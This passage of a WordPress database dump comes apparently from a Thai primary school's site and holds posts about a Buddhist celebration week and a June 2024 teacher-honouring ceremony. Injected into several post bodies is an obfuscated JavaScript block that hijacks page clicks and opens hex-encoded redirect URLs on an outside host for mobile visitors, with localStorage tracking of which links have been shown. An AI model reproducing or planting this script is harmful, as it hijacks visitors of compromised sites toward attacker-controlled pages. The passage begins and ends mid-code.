_0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์ กิจกรรม “สัปดาห์ส่งเสริมการเผยแผ่พระพุทธศาสนา เนื่องในเทศกาลวันวิสาขบูชา ปี 2567”','','inherit','closed','closed','','429-revision-v1','','','2024-08-01 20:50:10','2024-08-01 13:50:10','',429,'http://pakhaeng.ssk.in.th/?p=431',0,'revision','',0),
(432,1,'2024-08-01 20:51:18','2024-08-01 13:51:18','<!-- wp:paragraph -->\n<p><strong>เมื่อวันที่ 13 เดือนมิถุนายน พ.ศ.2567 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ ได้จัดกิจกรรมวันไหว้ครู เพื่อปลูกฝังให้ผู้เรียนได้เรียนรู้ ให้ความสำคัญและรำลึกถึงพระคุณครู ณ อาคารเมตตา โดยมี ท่านผู้อำนวยการเสน่หา พลโสภา เป็นประธานในพิธีในครั้งนี้ กิจกรรมประกอบไปด้วยวจนพิธีกรรม การกล่าวบทบูชาครู พร้อมทั้งร่วมกันร้องเพลงพระคุณที่สาม เพื่อมอบเป็นของขวัญแด่คุณครูในโอกาสวันไหว้ครู</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":433,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/21-67-724x1024.png\" alt=\"\" class=\"wp-image-433\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์ \"พิธีไหว้ครู 2567\"','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c-%e0%b8%9e%e0%b8%b4','','','2024-08-01 20:51:19','2024-08-01 13:51:19','',0,'http://pakhaeng.ssk.in.th/?p=432',0,'post','',0),
(433,1,'2024-08-01 20:51:09','2024-08-01 13:51:09','','21-67','','inherit','','closed','','21-67','','','2024-08-01 20:51:09','2024-08-01 13:51:09','',432,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/21-67.png',0,'attachment','image/png',0),
(434,1,'2024-08-01 20:51:18','2024-08-01 13:51:18','<!-- wp:paragraph -->\n<p><strong>เมื่อวันที่ 13 เดือนมิถุนายน พ.ศ.2567 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ ได้จัดกิจกรรมวันไหว้ครู เพื่อปลูกฝังให้ผู้เรียนได้เรียนรู้ ให้ความสำคัญและรำลึกถึงพระคุณครู ณ อาคารเมตตา โดยมี ท่านผู้อำนวยการเสน่หา พลโสภา เป็นประธานในพิธีในครั้งนี้ กิจกรรมประกอบไปด้วยวจนพิธีกรรม การกล่าวบทบูชาครู พร้อมทั้งร่วมกันร้องเพลงพระคุณที่สาม เพื่อมอบเป็นของขวัญแด่คุณครูในโอกาสวันไหว้ครู</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":433,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/21-67-724x1024.png\" alt=\"\" class=\"wp-image-433\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const 